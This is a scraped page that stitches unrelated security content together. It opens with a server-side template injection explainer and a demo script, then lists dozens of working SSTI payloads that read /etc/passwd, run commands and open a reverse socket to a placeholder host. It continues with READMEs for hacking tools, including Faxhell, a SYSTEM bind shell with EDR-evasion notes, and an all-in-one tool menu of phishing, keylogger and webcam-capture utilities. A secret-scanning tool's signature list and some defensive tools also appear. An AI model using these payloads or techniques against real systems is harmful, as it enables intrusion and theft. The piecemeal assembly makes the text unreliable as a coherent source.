Template engines are designed to generate web pages by combining fixed templates with volatile data. Server-side template injection attacks can occur when user input is concatenated directly into a template, rather than passed in as data. This allows attackers to inject arbitrary template directives in order to manipulate the template engine, often enabling them to take complete control of the server. As the name suggests, server-side template injection payloads are delivered and evaluated server-side, potentially making them much more dangerous than a typical client-side template injection.
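
The difference between concatenating input into a template and passing it as data, as an added example that is not from the original page. `render()` is a deliberately tiny stand-in for a real template engine (an assumption for illustration): it substitutes context names and evaluates plain arithmetic inside `{{ }}`, which is enough to show why an arithmetic probe is evaluated in one case and echoed in the other.

```python
import ast
import operator
import re

# Arithmetic the stand-in engine is willing to evaluate inside {{ ... }}.
OPS = {ast.Add: operator.add, ast.Sub: operator.sub, ast.Mult: operator.mul}
EXPRESSION = re.compile(r"\{\{(.*?)\}\}")


def eval_arith(node):
    """Evaluate a parsed expression made only of numbers and + - *."""
    if isinstance(node, ast.Constant) and type(node.value) in (int, float):
        return node.value
    if isinstance(node, ast.BinOp) and type(node.op) in OPS:
        return OPS[type(node.op)](eval_arith(node.left), eval_arith(node.right))
    raise ValueError("unsupported expression")


def render(template, context):
    """Single pass over the template: substituted values are never re-parsed,
    so template syntax inside *data* stays inert."""
    def substitute(match):
        expr = match.group(1).strip()
        if expr in context:
            return str(context[expr])
        try:
            return str(eval_arith(ast.parse(expr, mode="eval").body))
        except (ValueError, SyntaxError):
            return match.group(0)  # leave anything else untouched
    return EXPRESSION.sub(substitute, template)


def greet_vulnerable(user_input):
    # Input becomes part of the template source, so the engine parses it.
    return render("Hello " + user_input + "!", {})


def greet_safe(user_input):
    # The template is fixed; input only ever travels as a context value.
    return render("Hello {{ name }}!", {"name": user_input})


if __name__ == "__main__":
    probe = "{{3*3}}"
    print(greet_vulnerable(probe))  # the expression is evaluated
    print(greet_safe(probe))        # the expression is echoed as text
```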

Impact :
Server-side template injection vulnerabilities can expose websites to a variety of attacks depending on the template engine in question and how exactly the application uses it. In certain rare circumstances, these vulnerabilities pose no real security risk. However, most of the time, the impact of server-side template injection can be catastrophic.
At the severe end of the scale, an attacker can potentially achieve remote code execution, taking full control of the backend server and using it to perform other attacks on internal infrastructure.
Even in cases where full remote code execution is not possible, an attacker can often still use server-side template injection as the basis for numerous other attacks, potentially gaining read access to sensitive data and arbitrary files on the server.

Payloads :
{{2*2}}[[3*3]]
{{3*3}}
{{3*'3'}}
<%= 3 * 3 %>
${6*6}
${{3*3}}
@(6+5)
#{3*3}
#{ 3 * 3 }
{{dump(app)}}
{{app.request.server.all|join(',')}}
{{config.items()}}
{{ [].class.base.subclasses() }}
{{''.class.mro()[1].subclasses()}}
{{ ''.__class__.__mro__[2].__subclasses__() }}
{% for key, value in config.iteritems() %}<dt>{{ key|e }}</dt><dd>{{ value|e }}</dd>{% endfor %}
{{'a'.toUpperCase()}}
{{ request }}
{{self}}
<%= File.open('/etc/passwd').read %>
<#assign ex = "freemarker.template.utility.Execute"?new()>${ ex("id")}
[#assign ex = 'freemarker.template.utility.Execute'?new()]${ ex('id')}
${"freemarker.template.utility.Execute"?new()("id")}
{{app.request.query.filter(0,0,1024,{'options':'system'})}}
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}
{{ config.items()[4][1].__class__.__mro__[2].__subclasses__()[40] ("/etc/passwd").read() }}
{{''.__class__.mro()[1].__subclasses__()[396]('cat flag.txt',shell=True,stdout=-1).communicate()[0].strip()}}
{{config.__class__.__init__.__globals__['os'].popen('ls').read()}}
{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen(request.args.input).read()}}{%endif%}{%endfor%}
{$smarty.version}
{php}echo `id`;{/php}
{{['id']|filter('system')}}
{{['cat\x20/etc/passwd']|filter('system')}}
{{['cat$IFS/etc/passwd']|filter('system')}}
{{request|attr([request.args.usc*2,request.args.class,request.args.usc*2]|join)}}
{{request|attr(["_"*2,"class","_"*2]|join)}}
{{request|attr(["__","class","__"]|join)}}
{{request|attr("__class__")}}
{{request.__class__}}
{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\ x5f')('os')|attr('popen')('id')|attr('read')()}}
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"new java.lang.String('xxx')\")}}
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"whoami\\\"); x.start()\")}}
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"netstat\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"uname\\\",\\\"-a\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}
{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x ()._module.__builtins__['__import__']('os').popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"ip\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/cat\", \"flag.txt\"]);'").read().zfill(417)}}{%endif%}{% endfor %}
${T(java.lang.System).getenv()}
${T(java.lang.Runtime).getRuntime().exec('cat etc/passwd')}
${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).co ncat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}

References :

Cloning an Existing Repository ( Clone with HTTPS )
root@ismailtasdelen:~# git clone https://github.com/payloadbox/ssti-payloads.git

Cloning an Existing Repository ( Clone with SSH )
root@ismailtasdelen:~# git clone git@github.com:payloadbox/ssti-payloads.git


How to Report IP Addresses

Spam is a common nuisance for users of the Internet. However, it is not just annoying - these messages may cause substantial harm. While businesses use spam as a cheap way of promotion, criminals send it to snatch sensitive data. Fortunately, there is a quick way to counteract the offenders. 
Every source of spam has a unique identifier. An IP address is assigned to any internet-connected device. When it is reported to special watchdog services, senders are blocked automatically. You can learn how to report an IP address at https://cleantalk.org/blacklists/report-ip and keep cheeky spammers at bay.


The Purpose

Companies developing such software compile blacklists of fishy senders. These are crucial for anti-spam defense. Any user can contribute to the fight against spam. With basic details (domain/IP), you can add cyber offenders to the database.  However, this is just one use of the system.
On the other hand, IP reporting services are handy for companies. They can make sure their marketing efforts will not be futile. Emails from blacklisted sources never reach their target audience. Thus, any sender of sizeable volumes should first check if their IP is legit. 
Thirdly, such lists are vital for the advancement of Internet filters. Internet Service Providers (ISPs) never stop improving their barriers and they need to update data. Every complaint added to such blacklist improves the efficiency of cyber protection. The effects are felt across the web.

How Blacklists Work 

All sources of active mailing can be identified by their IP or domain. Mail Abuse Prevention Systems track these identifiers and spot suspicious senders. This is not rocket science.
What happens once you hit the ‘Send’ button for an email? Your IP address is detected by the mail system. Servers of the recipient’s side can now verify you as the sender. To do so, they reach out to blacklists. If the IP/domain was previously reported, the message will either go to the junk or be rejected completely - this depends on the number of complaints. 
Complaints never stop flowing in. For instance, one of the biggest databases now has 4.8+ million IPs, roughly 13+ million emails, and almost 1.5 million sites. But where does the data come from?

Sources of Information 

There are two key sources of blacklisting. These are manual and automatic. On the one hand, users submit complaints. Meanwhile, open relay servers and spamming software are detected by defense systems. Finally, inactive email addresses may function as spam traps. In the first subjective case, common triggers are situations when users:

  • do not remember signing up;
  • cannot find the unsubscribe link;
  • get too many messages, or
  • dislike the content generally.



Using Blacklists to Report and Check

Companies should check their IPs regularly. A blacklisted address sends any message to oblivion, regardless of content. Users, on the other hand, can report annoying spammers. Both procedures are simple: open the blacklist, enter the IP/email address, and hit ‘Search’ to launch the check. Alternatively, select an attack type and hit ‘Send report’.








GoGhost - High Performance, Lightweight, Portable Open Source Tool For Mass SMBGhost Scan


GoGhost is a High Performance, lightweight, portable Open Source tool for mass SMBGhost Scan.

Installation
You can download the Windows binary or the Linux binary. Alternatively, GoGhost uses only native Golang libraries, so the line below is enough to compile it:
go build GoGhost.go

Usage Options


GoGhost Scanned 25,000 IP addresses in less than 3 seconds, NMAP took more than 600.


-iL [FILE]
By using the -iL option you can specify a file containing a list of CIDRs.

-iR [CIDR]
By using the -iR option you're able to specify an IP Range.

False Positive & False Negative
If the Windows host is patched with KB4551762, GoGhost will still flag it as vulnerable. If the list of CIDRs in the file covers more than 500k IP addresses, it may flag some vulnerable hosts as Timeout.

The Results
Timeout => Closed Port
Not Vulnerable => Does not have compression
Vulnerable => LZNT1 compression on SMB.

Disclaimer
This tool was coded to measure the impact of SMBGhost in Latin America and Deepsecurity is not responsible for the use of this tool.


FastNetMon Community - Very Fast DDoS Analyzer With Sflow/Netflow/Mirror Support


FastNetMon - A high performance DoS/DDoS load analyzer built on top of multiple packet capture engines (NetFlow, IPFIX, sFlow, AF_PACKET, SnabbSwitch, netmap, PF_RING (obsoleted), PCAP).

What do we do?
We detect hosts in the deployed network sending or receiving large volumes of traffic, packets/bytes/flows, per second and perform a configurable action to handle that event. These configurable actions include notifying you, switching off the server, or blackholing the client.
Flow is one or more ICMP, UDP, or TCP packets which can be identified via their unique src IP, dst IP, src port, dst port, and protocol fields.

Integration with flow systems
At a very high level, integration with FastNetMon is fairly simple. In both cases the workflow is the same; the main difference is the port number provided. The port numbers are configurable.

sFlow
Configure the IP of the server running FastNetMon using port 6343. This port number is configurable.

Netflow
Configure the IP of the server running FastNetMon using port 2055. This port number is configurable.
License: GPLv2
Official mirror at GitLab

Project

Official support groups:

Follow us at social media:

Supported packet capture engines
  • NetFlow v5, v9
  • IPFIX
  • sflow v4, v5
  • PCAP
  • AF_PACKET
  • Netmap
  • SnabbSwitch (experimental)
  • PF_RING / PF_RING ZC (obsoleted, not recommended, please use AF_PACKET instead)
You can check out the comparison table for all available packet capture engines.

Complete integration with the following vendors

Features
  • Complete BGP Flow Spec support, RFC 5575
  • Process and distinguish incoming and/or outgoing traffic
  • Trigger block/notify script if an IP exceeds defined thresholds for packets/bytes/flows per second
  • Thresholds can be configured per-subnet with the hostgroups feature
  • Announce blocked IPs via BGP to routers with ExaBGP
  • GoBGP integration for unicast IPv4 announcements (available in master branch only).
  • Full integration with Graphite and InfluxDB
  • API (available in master branch only)
  • Redis integration
  • MongoDB integration
  • Deep Packet Inspection (DPI) for attack traffic
  • netmap support (open source; wire speed processing; only Intel hardware NICs or any hypervisor VM type)
  • SnabbSwitch support (open source, very flexible, LUA driven, very-very-very fast)
  • Filter NetFlow v5 flows or sFLOW packets with LUA scripts (useful for excluding particular ports)
  • Supports L2TP decapsulation, VLAN untagging and MPLS processing in mirror mode
  • Works on server/soft-router
  • Detects DoS/DDoS in as little as 1-2 seconds
  • Tested up to 10Gbps with 12Mpps on an Intel i7-3820 processor with an Intel 82599 NIC
  • Complete plug-in support
  • Capture attack fingerprints in PCAP format
  • Complete support for most popular attack types

Running Fastnetmon

Supported platforms

Supported architectures
  • x86 64-bit (recommended)
  • x86 32-bit

Hardware requirements
  • At least 1 GB of RAM for compilation purposes

Router integration instructions

Distributions supported

Screenshots
Main program:


Example CPU load on Intel i7-2600 with Intel X540/82599 NIC at 400Kpps load:


Example deployment scheme:


Example of notification email about detected attack:
Author: Pavel Odintsov


HackingTool - ALL IN ONE Hacking Tool For Hackers


This project is still in BETA, so you may face problems. Please open an issue so I'll fix them.

Hackingtool Menu
  • AnonSurf
  • Information Gathering
  • Password Attack
  • Wireless Attack
  • SQL Injection Tools
  • Phishing Attack
  • Web Attack Tool
  • Post exploitation
  • Forensic Tools
  • Payload Creator
  • Router Exploit
  • Wifi Jamming
  • SocialMedia Attack
  • SocialMedia Finder
  • Android Hack
  • Steganography
  • Other Tools
  • Update System

AnonSurf
  • Anonymously Surf
  • Multitor

Information Gathering
  • Nmap
  • Dracnmap
  • Port Scanning
  • Host To IP
  • Xerosploit
  • Advanced XSS Detection Suite
  • ReconSpider

Password Attack
  • Cupp
  • WordlistCreator
  • Goblin WordGenerator
  • Credential reuse attacks

Wireless Attack
  • WiFi-Pumpkin
  • pixiewps
  • Bluetooth Honeypot GUI Framework
  • Fluxion
  • Wifiphisher
  • Wifite
  • EvilTwin

SQL Injection Tools
  • sqlmap tool

Phishing Attack
  • Setoolkit
  • SocialFish
  • Shellphish
  • BlackEye
  • I-See_You(Get Location using phishing attack)
  • SayCheese (Grab target's Webcam Shots)
  • QR Code Jacking

Web Attack
  • SlowLoris
  • Skipfish
  • SubDomain Finder
  • CheckURL
  • Blazy

Post Exploitation
  • Vegile - Ghost In The Shell
  • Chrome Keylogger

Forensic Tool
  • Bulk_extractor
  • Disk Clone and ISO Image Acquire
  • AutoSpy

Payload Generator
  • The FatRat*
  • Brutal
  • Stitch
  • MSFvenom Payload Creator
  • Venom Shellcode Generator
  • Spycam

Router Exploitation
  • RouterSploit
  • Fastssh

SocialMedia Attack
  • Instagram Attack
  • Tweeter Attack
  • Facebook Attack
  • Application Checker

SocialMedia Finder
  • Find SocialMedia By Facial Recognition System
  • Find SocialMedia By UserName

Android Hacking
  • Keydroid
  • MySMS
  • Getdroid
  • DroidFiles (Get files from Android Directories)
  • Lockphish (Grab target LOCK PIN)
  • Whatsapp Attack
  • DroidCam (Capture Image)
  • EvilApp (Hijack Session)

Steganography
  • SteganoHide
  • StegnoCracker
  • Whitespace






Installation in Linux :

This Tool Must Run As ROOT !!!
git clone https://github.com/Z4nzu/hackingtool.git

chmod -R 755 hackingtool && cd hackingtool

sudo pip3 install -r requirement.txt

./install.sh

sudo hackingtool
After Following All Steps Just Type In Terminal root@kaliLinux:~hackingtool

Some tools used in hackingtool are by the authors below:
thelinuxchoice
UndeadSec




Exe_To_Dll - Converts A EXE Into DLL


Converts an EXE, so that it can be loaded like a DLL.
Supports both 32 and 64 bit DLLs
Inspired by the idea of @guywhataguy. Read more here.

Download:
Fresh builds can be downloaded from the build server (click on the build and choose the "Artifacts" tab)

Clone:
Use recursive clone to get the repo together with all the submodules:
git clone --recursive https://github.com/hasherezade/exe_to_dll.git


Faxhell - A Bind Shell Using The Fax Service And A DLL Hijack



A Proof-of-Concept bind shell using the Fax service and a DLL hijack based on Ualapi.dll.
See our writeup at: https://windows-internals.com/faxing-your-way-to-system/

How to use
  • Build Ualapi.dll and place in c:\windows\system32
  • Start the Fax service, which will load the DLL and call the export UalStart. UalStart will queue a thread pool work item that will open a handle to RpcSs, find a SYSTEM token, and then impersonate it. Afterward, it will create a socket on the local endpoint address, bind it to port 9299, and then asynchronously wait for a connection using a thread pool I/O completion port.
  • Connect to the socket on port 9299 using your favorite client (such as nc(at).exe <ip> 9299) and then type let me in and press ENTER. If you're writing custom code, make sure to send the string let me in\n.
  • The I/O completion packet will then wake up the thread pool callback, which will start a Cmd.exe process under the DcomLaunch service with SYSTEM privileges, binding its input and output handles to the newly created socket.
  • Win!

EDR / AV evasion
  • Uses a service that is not commonly known and not monitored or flagged as suspicious by EDR vendors.
  • Uses the Windows thread pool API to do setup, making stacks harder to read, offloading work through multiple threads, and avoiding easy "hints" that something suspicious is happening.
  • The lifetime of the impersonated tokens is very small, and only the worker thread ever runs as SYSTEM, reverting back to NETWORK SERVICE very quickly and after only doing one API call. This helps reduce the chance of getting caught by various scanners.
  • Uses uncommon socket APIs that make the import table less suspicious and avoids EDR detections, IOCTL hooks, and LSPs.
  • Creates the bind shell under the DcomLaunch service (which is already a SYSTEM service) and not under the Fax service, making it look a lot more natural and avoiding a very suspicious-looking process tree.
  • Leverages a Windows bug that makes it look as if our socket belongs to the Fax service, and not to DcomLaunch or Cmd.exe. If we kill the Fax service, it looks like the socket belongs to System.

Caveats
This isn't meant to be a drop-in, undetectable, malicious, weaponized shell:
  • It is only a bind shell, which most firewalls will prevent. Opening firewall rules, or using a reverse bind shell, or doing communications over a common port such as 80 or 443 would work better.
  • Other services, notably the Spooler, also load Ualapi.dll. While the system behaves fine if the Fax service is "stuck" in the SERVICE_START_PENDING state, this will cause issues in Spoolsv.exe.
  • There's probably bugs/memory leaks in the PoC -- we tried our best to make things production quality, but we did not run things through Application Verifier or asan.



Git All The Payloads! A Collection Of Web Attack Payloads


Git All the Payloads! A collection of web attack payloads. Pull requests are welcome!

Usage
Run ./get.sh to download external payloads and unzip any payload files that are compressed.

Payload Credits

OWASP

Other

ctf
Requests extracted from either packet captures or log files of capture the flag (ctf) events. Mostly raw data so not all requests are actual payloads, however requests should be deduplicated.

Miscellaneous


Airshare - Cross-platform Content Sharing In A Local Network


Airshare is a Python-based CLI tool and module that lets you transfer data between two machines in a local network, P2P, using Multicast-DNS. It also opens an HTTP gateway for other non-CLI external interfaces. It works completely offline! Built with aiohttp and zeroconf. Check out the demo.

Features
  • Blazing fast content transfer within a local network.
  • Lets you transfer plain text, send from or receive into your clipboard.
  • Supports transfer of multiple files, directories and large files - content is sent chunk by chunk and never read into memory entirely.
  • Lets you send files whose paths have been copied into the clipboard (more details in the docs).
  • Cross-platform, works on Linux, Windows and Mac (CLI and Web Interface), and also supports mobile (Web Interface).
  • Uses Multicast-DNS service registration and discovery - so you can access content with human-readable code words.
  • Can be used as a module in other Python programs.

Important Links
Source Code: https://github.com/KuroLabs/Airshare
Bug Reports: https://github.com/KuroLabs/Airshare/issues
Documentation: https://airshare.rtfd.io
PyPI: https://pypi.org/project/Airshare

Installation

pip
$ pip install Airshare

pipx
$ pipx install Airshare

Homebrew
$ brew install airshare

Example
Send and receive files and directories.
To send using the CLI,
$ airshare noobmaster requirements.txt
To receive using the CLI,
$ airshare noobmaster
or visit http://noobmaster.local:8000 in the browser to download.
You can also import airshare in any Python program. Visit the documentation for detailed usage instructions.

Known Issues
  • Link-local Name Resolution (for the .local addresses) on non-Apple devices requires Avahi (on Linux) or Bonjour (on Windows). Chances are you already have them, but if you don't, do check the web on how to install them.
  • Android browsers do not have inbuilt Multicast-DNS service discovery, and cannot resolve the .local addresses. For this reason, we included QR Code support, for you to visit the URLs easily.
  • Windows users with Python < 3.8, use Ctrl + Break to quit, as Ctrl + C will not work. This is a known issue with asyncio, which has been fixed in Python 3.8. If you do not have a Break key, try using Ctrl + Fn + B, or check the web for other alternatives (depending on your PC).


Scant3R - Web Security Scanner


ScanT3r - Web Security Scanner


# Coded By : Khaled Nassar @knassar702
  • Detects these vulnerabilities
    • Remote Code Execution
      • Linux
    • XSS Reflected
    • Template Injection
      • Jinja2
      • ERB
      • Java
      • Twig
      • Freemarker
    • SQL Injection


OS Support :
  • Linux
  • Android
  • Windows

Install

Linux
  • open your terminal
  • enter this command
    $ git clone https://github.com/knassar702/scant3r 
    $ cd scant3r
    $ python3 -m pip install -r requirements.txt

Android
  • Download Termux App
  • open termux app
  • enter this command
    $ pkg install python -y
    $ pkg install git -y
    $ git clone https://github.com/knassar702/scant3r
    $ cd scant3r
    $ python3 -m pip install -r requirements.txt

Windows
  • Download python3 and install it
  • open your cmd
  • enter this command
$ python3 -m pip install -r requirements.txt

Usage :
Options:
-h, --help | Show help message and exit
--version | Show program's version number and exit
-u URL, --url=URL | Target URL (e.g."http://www.target.com/vuln.php?id=1")
--data=DATA | Data string to be sent through POST (e.g. "id=1")
--list=FILE | Get All Urls from List
--threads | Max number of concurrent HTTP(s) requests (default 10)
--timeout | Seconds to wait before timeout connection
--proxy | Start The Connection with http(s) proxy
--cookies | HTTP Cookie header value (e.g. "PHPSESSID=a8d127e..")
--encode | How many times to encode the payload (default 1)
--allow-redirect | Allow the main redirect
--user-agent | add custom user-agent
--scan-headers | Try to inject payloads in headers, not parameters (user-agent, referrer)
--skip-headers | Skip the headers scanning process
--sleep | Sent one request after some Seconds
--module | add custom module (e.g. "google.py")
--debug | Debugging mode

Example :
  • post method
    $ python3 scant3r -u 'http://localhost/dvwa/vulnerabilities/exec/' --data='ip=localhost&Submit=Submit'
  • add cookies
    $ python3 scant3r -u 'http://localhost/?l=2' --cookies='user=admin&id=1'
  • add timeout
    $ python3 scant3r -u 'http://localhost/?l=13' --timeout=1
  • allow redirects (302,301)
    $ python3 scant3r -u 'http://localhost/?l=13' --allow-redirect
  • sleeping
    $ python3 scant3r -u 'http://localhost/?l=13' --sleep=2
  • debugging mode
    $ python3 scant3r -u 'http://localhost/?l=13' --debug
  • scanning all headers
    $ python3 scant3r -u 'http://localhost/?l=13' --scan-headers
  • skip headers
    $ python3 scant3r -u 'http://localhost/?l=13' --skip-headers
  • add custom user-agent
    $ python3 scant3r -u 'http://localhost/?l=13' --user-agent='CustomUseragent(v2)'
  • add encoding
    $ python3 scant3r -u 'http://localhost/?l=13' --encode=2
  • add proxy
    $ python3 scant3r -u 'http://localhost/?l=13' --proxy='http://localhost:8080'
  • run your own module
    $ python3 scant3r -u 'http://localhost/?l=13' --module=dumper.py
  • add urls list
    $ python3 scant3r --list urls.txt --threads=40


Shhgit - Find GitHub Secrets In Real Time





Shhgit finds secrets and sensitive files across GitHub code and Gists committed in near real time by listening to the GitHub Events API.

NEW: LIVE VERSION. Find GitHub secrets straight from your browser!

Finding secrets in GitHub is nothing new. There are many great tools available to help with this depending on which side of the fence you sit. On the adversarial side, popular tools such as gitrob and truffleHog focus on digging in to commit history to find secret tokens from specific repositories, users or organisations. On the defensive side, GitHub themselves are actively scanning for secrets through their token scanning project. Their objective is to identify secret tokens within committed code in real-time and notify the service provider to action. So in theory if any AWS secret keys are committed to GitHub, Amazon will be notified and automatically revoke them.
I developed shhgit to raise awareness and bring to life the prevalence of this issue. I hope GitHub will do more to prevent bad actors using the treasure trove of information across the platform. I don't know the inner-workings of their token scanning project but delaying the real-time feed API until the pipeline has completed and posing SLAs on the providers seems like a step in the right direction.
With some tweaking of the signatures shhgit would make an awesome addition to your bug bounty toolkit.

Run from Docker
  1. Edit config.yaml and insert your github credentials
  2. $ docker run -v $(pwd)/config.yaml:/config.yaml:ro fnxpt/shhgit


Installation
You can use the precompiled binaries or build from source:
  1. Install Go for your platform.
  2. $ go get github.com/eth0izzle/shhgit will download and build shhgit.
  3. See usage.

Usage
shhgit needs to access the public GitHub API so you will need to obtain and provide an access token. The API has a hard rate limit of 5,000 requests per hour per account, regardless what token is used. The more account-unique tokens you provide, the faster you can process the events. Follow this guide to generate a token; it doesn't require any scopes or permissions. And then place it under github_access_tokens in config.yaml. Note that it is against the GitHub terms to bypass their rate limits. Use multiple tokens at your own risk.
Unlike other tools, you don't need to pass any targets with shhgit. Simply run $ shhgit to start watching GitHub commits and find secrets or sensitive files matching the included 120 signatures.
Alternatively, you can forgo the signatures and use shhgit with a search query, e.g. to find all AWS keys you could use shhgit --search-query AWS_ACCESS_KEY_ID=AKIA

Options
--clone-repository-timeout
Maximum time it should take to clone a repository in seconds (default 10)
--csv-path
Specify a path if you want to write found secrets to a CSV. Leave blank to disable
--debug
Print debugging information
--entropy-threshold
Finds high entropy strings in files. Higher threshold = more secret secrets, lower threshold = more false positives. Set to 0 to disable entropy checks (default 5.0)
--maximum-file-size
Maximum file size to process in KB (default 512)
--maximum-repository-size
Maximum repository size to download and process in KB (default 5120)
--minimum-stars
Only clone repositories with this many stars or higher. Set to 0 to ignore star count (default 0)
--path-checks
Set to false to disable file name/path signature checking, i.e. just match regex patterns (default true)
--process-gists
Watch and process Gists in real time. Set to false to disable (default true)
--search-query
Specify a search string to ignore signatures and filter on files containing this string (regex compatible)
--silent
Suppress all output except for errors
--temp-directory
Directory to store repositories/matches (default "%temp%\shhgit")
--threads
Number of concurrent threads to use (default number of logical CPUs)

Config
The config.yaml file has 6 elements. A default is provided.
github_access_tokens: # provide at least one token
  - 'token one'
  - 'token two'
slack_webhook: '' # url to your slack webhook. Found secrets will be sent here
blacklisted_extensions: [] # list of extensions to ignore
blacklisted_paths: [] # list of paths to ignore
blacklisted_entropy_extensions: [] # additional extensions to ignore for entropy checks
signatures: # list of signatures to check
  - part: '' # either filename, extension, path or contents
    match: '' # simple text comparison (if no regex element)
    regex: '' # regex pattern (if no match element)
    name: '' # name of the signature

Signatures
shhgit comes with 120 signatures. You can remove or add more by editing config.yaml.
Chef private key, Potential Linux shadow file, Potential Linux passwd file, Docker configuration file, NPM configuration file, Environment configuration file, Contains a private key, AWS Access Key ID Value, AWS Access Key ID, AWS Account ID, AWS Secret Access Key, AWS Session Token, Artifactory, CodeClimate, Facebook access token, Google (GCM) Service account, Stripe API key, Google OAuth Key, Google Cloud API Key
Google OAuth Access Token, Picatic API key, Square Access Token, Square OAuth Secret, PayPal/Braintree Access Token, Amazon MWS Auth Token, Twilo API Key, MailGun API Key, MailChimp API Key, SSH Password, Outlook team, Sauce Token, Slack Token, Slack Webhook, SonarQube Docs API Key, HockeyApp, Username and password in URI, NuGet API Key, Potential cryptographic private key, Log file, Potential cryptographic key bundle, Potential cryptographic key bundle
Potential cryptographic key bundle, Potential cryptographic key bundle, Pidgin OTR private key, OpenVPN client configuration file, Azure service configuration schema file, Remote Desktop connection file, Microsoft SQL database file, Microsoft SQL server compact database file, SQLite database file, SQLite3 database file, Microsoft BitLocker recovery key file
Microsoft BitLocker Trusted Platform Module password file, Windows BitLocker full volume encrypted data file, Java keystore file, Password Safe database file, Ruby On Rails secret token configuration file, Carrierwave configuration file, Potential Ruby On Rails database configuration file, OmniAuth configuration file, Django configuration file
1Password password manager database file, Apple Keychain database file, Network traffic capture file, GnuCash database file, Jenkins publish over SSH plugin file, Potential Jenkins credentials file, KDE Wallet Manager database file, Potential MediaWiki configuration file, Tunnelblick VPN configuration file, Sequel Pro MySQL database manager bookmark file, Little Snitch firewall configuration file, Day One journal file, Potential jrnl journal file, Chef Knife configuration file, cPanel backup ProFTPd credentials file
Robomongo MongoDB manager configuration file, FileZilla FTP configuration file, FileZilla FTP recent servers file, Ventrilo server configuration file, Terraform variable config file, Shell configuration file, Shell configuration file, Shell configuration file, Private SSH key, Private SSH key, Private SSH key, Private SSH key, SSH configuration file, Potential cryptographic private key, Shell command history file
MySQL client command history file, PostgreSQL client command history file, PostgreSQL password file, Ruby IRB console history file, Pidgin chat client account configuration file, Hexchat/XChat IRC client server list configuration file, Irssi IRC client configuration file, Recon-ng web reconnaissance framework API key database, DBeaver SQL database manager configuration file, Mutt e-mail client configuration file, S3cmd configuration file, AWS CLI credentials file, SFTP connection configuration file, T command-line Twitter client configuration file, Shell configuration file
Shell profile configuration file, Shell command alias configuration file, PHP configuration file, GNOME Keyring database file, KeePass password manager database file, SQL dump file, Apache htpasswd file, Configuration file for auto-login process, Rubygems credentials file, Tugboat DigitalOcean management tool configuration, DigitalOcean doctl command-line client configuration file, git-credential-store helper credentials file, GitHub Hub command-line client configuration file, Git configuration file

Contributing
  1. Fork it, baby!
  2. Create your feature branch: git checkout -b my-new-feature
  3. Commit your changes: git commit -am 'Add some feature'
  4. Push to the branch: git push origin my-new-feature
  5. Submit a pull request.

Credits
Some code borrowed from Gitrob by Michael Henriksen.

Disclaimer
I take no responsibility for how you use this tool. Don't be a dick.


Harbian-Audit - Hardened Debian GNU/Linux Distro Auditing


Hardened Debian GNU/Linux and CentOS 8 distro auditing.
The main test environments are Debian GNU/Linux 9/10 and CentOS 8; other versions are not fully tested. Desktop and SELinux related items are not implemented in this release.
The code framework is based on the OVH-debian-cis project. Some of the original implementations were modified according to the features of Debian 9/10 and CentOS 8; check items were added and implemented for STIG Red_Hat_Enterprise_Linux_7_V2R5, STIG Ubuntu V1R2 and cisecurity.org recommendations, along with some check items from the HardenedLinux community. The audit and apply functions of the infrastructure are implemented, and automatic fixing is implemented for the items that can be fixed automatically.

$ sudo bash bin/hardening.sh --audit-all
[...]
hardening [INFO] Treating /home/test/harbian-audit/bin/hardening/13.15_check_duplicate_gid.sh
13.15_check_duplicate_gid [INFO] Working on 13.15_check_duplicate_gid
13.15_check_duplicate_gid [INFO] Checking Configuration
13.15_check_duplicate_gid [INFO] Performing audit
13.15_check_duplicate_gid [ OK ] No duplicate GIDs
13.15_check_duplicate_gid [ OK ] Check Passed

[...]
################### SUMMARY ###################
Total Available Checks : 278
Total Runned Checks : 278
Total Passed Checks : [ 239/278 ]
Total Failed Checks : [ 39/278 ]
Enabled Checks Percentage : 100.00 %
Conformity Percentage : 85.97 %

Quickstart
$ git clone https://github.com/hardenedlinux/harbian-audit.git && cd harbian-audit
$ sudo cp etc/default.cfg /etc/default/cis-hardening
$ sudo sed -i "s#CIS_ROOT_DIR=.*#CIS_ROOT_DIR='$(pwd)'#" /etc/default/cis-hardening
$ sudo bin/hardening.sh --init
$ sudo bin/hardening.sh --audit-all
hardening [INFO] Treating /home/test/harbian-audit/bin/hardening/1.1_install_updates.sh
1.1_install_updates [INFO] Working on 1.1_install_updates
1.1_install_updates [INFO] Checking Configuration
1.1_install_updates [INFO] Performing audit
1.1_install_updates [INFO] Checking if apt needs an update
1.1_install_updates [INFO] Fetching upgrades ...
1.1_install_updates [ OK ] No upgrades available
1.1_install_updates [ OK ] Check Passed
[...]
################### SUMMARY ###################
Total Available Checks : 278
Total Runned Checks : 278
